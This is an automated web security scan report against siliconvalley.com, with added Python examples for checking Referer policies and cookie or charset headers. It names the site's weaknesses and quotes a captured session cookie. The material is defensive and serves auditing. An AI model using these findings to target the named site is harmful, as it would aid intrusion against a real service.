HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 04:07:48 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='silicon valley tech gmsv'><meta name="keywords" content="silicon valley tech gmsv"/><title> ...[SNIP]...
5. Session token in URL
There are 2 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 04:07:48 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='silicon valley tech gmsv'><meta name="keywords" content="silicon valley tech gmsv"/><title> ...[SNIP]... <div class="block GMSV_newsletter"><a href="https://secure.www.siliconvalley.com/registration/?rPage=login&url=http%3A%2F%2Fwww.siliconvalley.com%2F&eRightsSessionExpired=true">Get the GMSV <br> ...[SNIP]...
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 04:07:58 GMT Server: Apache/2.0.52 (Red Hat) Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!-- ...[SNIP]...
6. Cookie without HttpOnly flag set
There are 3 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 04:07:48 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/ Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='silicon valley tech gmsv'><meta name="keywords" content="silicon valley tech gmsv"/><title> ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
s_vi_khaoup=[CS]v4|0-0|4CE0B217[CE]; Expires=Sat, 14 Nov 2015 04:07:51 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
If no Domain attribute is set, a cookie is host-only: browsers send it only to the exact host that issued it, not to its subdomains and not to its parent domain. Omitting the Domain attribute from the Set-Cookie header therefore gives the narrowest possible scope, which is safe and appropriate in most situations. Note that a Domain attribute naming the issuing host itself (for example Domain=www.example.com) already widens the scope to every subdomain of that host. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi_khaoup=[CS]v4|0-0|4CE0B217[CE]; Expires=Sat, 14 Nov 2015 04:07:51 GMT; Domain=.2o7.net; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), and current browsers default to the strict-origin-when-cross-origin referrer policy, which sends only the scheme and host on cross-origin requests. This behaviour should not be relied upon to protect the originating URL from disclosure: older browsers send the full URL by default, and any page can opt back in to full referrers through an explicit Referrer-Policy header or a referrerpolicy attribute.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations (server access logs, proxies, browser history) and may be visible on-screen to untrusted parties. Where a page whose URL is sensitive must load third-party resources, also set a Referrer-Policy response header (for example Referrer-Policy: strict-origin-when-cross-origin, or no-referrer) so that supporting browsers send at most the origin; treat this as defence in depth rather than as a fix.
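The following Python is an added example, not part of the scan report or of the scanning tool: it computes the Referer value a browser sends for a request from a source page to a destination URL under each value of the Referrer-Policy header, following the referrer-determination algorithm of the Fetch and Referrer Policy specifications, and then checks whether the source page's query string (where a session token would sit) reaches the other domain. The URLs and the sessionid parameter are constructed for illustration.

```python
"""Which Referer does the browser send, and does it carry the page's query string?

Added example: implements the per-policy referrer rules (no-referrer,
no-referrer-when-downgrade, same-origin, origin, strict-origin,
origin-when-cross-origin, strict-origin-when-cross-origin, unsafe-url).
"""
from urllib.parse import urlsplit, urlunsplit

DEFAULT_PORTS = {"http": 80, "https": 443}
POLICIES = (
    "no-referrer", "no-referrer-when-downgrade", "same-origin", "origin",
    "strict-origin", "origin-when-cross-origin",
    "strict-origin-when-cross-origin", "unsafe-url",
)


def _host_port(u):
    """host[:port], omitting the port when it is the scheme's default."""
    port = u.port
    if port and port != DEFAULT_PORTS.get(u.scheme):
        return f"{u.hostname}:{port}"
    return u.hostname


def origin_referrer(url):
    """Origin-only referrer: scheme://host[:port]/ (browsers add the trailing slash)."""
    u = urlsplit(url)
    return f"{u.scheme}://{_host_port(u)}/"


def full_referrer(url):
    """Full referrer: userinfo and fragment stripped, query string kept."""
    u = urlsplit(url)
    return urlunsplit((u.scheme, _host_port(u), u.path or "/", u.query, ""))


def referer_for(source, destination, policy="strict-origin-when-cross-origin"):
    """Return the Referer string the browser sends, or None when it sends nothing."""
    same_origin = origin_referrer(source) == origin_referrer(destination)
    # "downgrade" = leaving a TLS-protected page for a plaintext resource
    downgrade = urlsplit(source).scheme == "https" and urlsplit(destination).scheme == "http"
    if policy == "no-referrer":
        return None
    if policy == "unsafe-url":
        return full_referrer(source)
    if policy == "no-referrer-when-downgrade":
        return None if downgrade else full_referrer(source)
    if policy == "same-origin":
        return full_referrer(source) if same_origin else None
    if policy == "origin":
        return origin_referrer(source)
    if policy == "strict-origin":
        return None if downgrade else origin_referrer(source)
    if policy == "origin-when-cross-origin":
        return full_referrer(source) if same_origin else origin_referrer(source)
    if policy == "strict-origin-when-cross-origin":
        if same_origin:
            return full_referrer(source)
        return None if downgrade else origin_referrer(source)
    raise ValueError(f"unknown referrer policy: {policy}")


def leaks_query(source, destination, policy):
    """True when the source page's query string is transmitted to the destination."""
    ref = referer_for(source, destination, policy)
    query = urlsplit(source).query
    return bool(query) and ref is not None and query in ref


if __name__ == "__main__":
    # Constructed: a page carrying a session token in its URL, loading a third-party resource.
    page = "https://app.example.com/account?sessionid=abc123"
    third_party = "https://metrics.2o7.net/b/ss"
    for policy in POLICIES:
        print(f"{policy:32s} -> {referer_for(page, third_party, policy)}")
```

The older browser default, no-referrer-when-downgrade, sends the whole URL (token included) to the third party whenever both sides are HTTPS; the modern default sends only the origin. Neither protects you if the page (or the third party's embed snippet) sets an unsafe-url policy, which is why the remediation above is to keep tokens out of the URL in the first place.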
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code. Where the script must be loaded from the third party's own domain, pin its content with Subresource Integrity (an integrity attribute carrying a hash of the expected script, together with crossorigin="anonymous") so that the browser refuses to execute a modified copy; this only works for scripts whose content does not change between deployments.
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 04:07:48 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html;charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='silicon valley tech gmsv'><meta name="keywords" content="silicon valley tech gmsv"/><title> ...[SNIP]... <a href="http://www.siliconvalley.com/ci_16596547" class="listingItemTitle">Biz Break: Will yourname@facebook.com be your new e-mail address?</a> ...[SNIP]... <a href="http://www.siliconvalley.com/ci_16596547?source=most_viewed">Biz Break: Will yourname@facebook.com be your new e-mail address?</a> ...[SNIP]...
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and historically led to cross-site scripting vulnerabilities in which encodings like UTF-7 were used to bypass the application's defensive filters; current browsers no longer sniff UTF-7, but encoding sniffing can still change how attacker-supplied bytes are interpreted.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-Type header a charset parameter naming the encoding the content was actually produced in, for example Content-Type: text/html; charset=UTF-8. A <meta charset> tag in the document is a useful fallback, but the HTTP header takes precedence and is the one to set.
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 04:07:58 GMT
Server: Apache/2.0.52 (Red Hat)
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Language: en-US
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - SiliconValley.com</title><!-- get profile info --><!-- ...[SNIP]...
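As an added example (not part of this report and not the scanner's own code), the following Python performs the three header checks reported above, cookies without HttpOnly, cookies scoped to a parent domain, and HTML responses without a charset, over raw HTTP responses, and ranks cookie findings by whether the cookie looks like a session token. The two siliconvalley.com responses are reconstructed (abridged) from the headers shown in the report, with the issuing host assumed to be www.siliconvalley.com; the tracker response and the host example.2o7.net are constructed around the s_vi_khaoup cookie quoted above. The Secure-flag check is an addition beyond what the report covers.

```python
"""Audit raw HTTP responses for the cookie-flag, cookie-scope and charset issues.

Added example. The session-token heuristic is deliberately simple: a
session-ish cookie name, or a long opaque alphanumeric value.
"""
import re

SESSION_NAME_RE = re.compile(r"sess|sid|token|auth", re.I)


def parse_response(raw):
    """Split a raw response into (status line, [(lowercased name, value)], body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    status, *lines = head.split("\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def parse_set_cookie(value):
    """Return (name, value, {lowercased attribute: value}) for one Set-Cookie value."""
    parts = [p.strip() for p in value.split(";")]
    name, _, cookie_value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), cookie_value.strip(), attrs


def looks_like_session(name, value):
    """Heuristic used to rank findings, mirroring the report's 'appears to contain a session token'."""
    if SESSION_NAME_RE.search(name):
        return True
    return len(value) >= 16 and re.fullmatch(r"[A-Za-z0-9+/=_-]+", value) is not None


def cookie_scope_is_parent(domain_attr, host):
    """True when Domain= names a parent of the issuing host, so every sibling
    subdomain receives the cookie. No Domain attribute means host-only scope."""
    if not domain_attr:
        return False
    domain = domain_attr.lstrip(".").lower()
    host = host.lower()
    return host != domain and host.endswith("." + domain)


def audit(host, raw, https=False):
    """Return findings as (issue, subject, involves_session_token) tuples, in header order."""
    _, headers, _ = parse_response(raw)
    findings = []
    for name, value in headers:
        if name == "set-cookie":
            cname, cval, attrs = parse_set_cookie(value)
            session = looks_like_session(cname, cval)
            if "httponly" not in attrs:
                findings.append(("cookie-without-httponly", cname, session))
            if https and "secure" not in attrs:  # only meaningful on a TLS origin
                findings.append(("cookie-without-secure", cname, session))
            if cookie_scope_is_parent(attrs.get("domain", ""), host):
                findings.append(("cookie-scoped-to-parent-domain", cname, session))
        elif name == "content-type":
            media, _, params = value.partition(";")
            if media.strip().lower() == "text/html" and "charset=" not in params.lower():
                findings.append(("html-without-charset", value, False))
    return findings


# Reconstructed (abridged) from the 200 response in the report; host assumed to be www.siliconvalley.com.
RESP_SV = (
    "HTTP/1.1 200 OK\r\nDate: Mon, 15 Nov 2010 04:07:48 GMT\r\n"
    "Server: Apache/2.0.52 (Red Hat)\r\n"
    "Set-Cookie: JSESSIONID=0ZTMTTJL4N3CACUUCAXCFEY; path=/\r\n"
    "Content-Type: text/html;charset=UTF-8\r\n\r\n<!DOCTYPE HTML ...>"
)
# Reconstructed (abridged) from the 404 response in the report: text/html with no charset.
RESP_SV_404 = (
    "HTTP/1.1 404 Not Found\r\nServer: Apache/2.0.52 (Red Hat)\r\n"
    "Content-Type: text/html\r\n\r\n<!DOCTYPE HTML ...>"
)
# Constructed: a tracker response carrying the parent-scoped cookie quoted in the report.
RESP_TRACKER = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: s_vi_khaoup=[CS]v4|0-0|4CE0B217[CE]; Expires=Sat, 14 Nov 2015 04:07:51 GMT; "
    "Domain=.2o7.net; Path=/\r\nContent-Type: image/gif\r\n\r\n"
)

if __name__ == "__main__":
    for host, raw in [("www.siliconvalley.com", RESP_SV),
                      ("www.siliconvalley.com", RESP_SV_404),
                      ("example.2o7.net", RESP_TRACKER)]:
        for issue, subject, session in audit(host, raw):
            print(f"{host}: {issue} ({subject}){' [session token]' if session else ''}")
```

The same loop is the natural place to add a SameSite check for cookies flagged as session tokens; it is left out here because the report does not cover it.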
Report generated by XSS.CX at Sun Nov 14 22:14:00 CST 2010.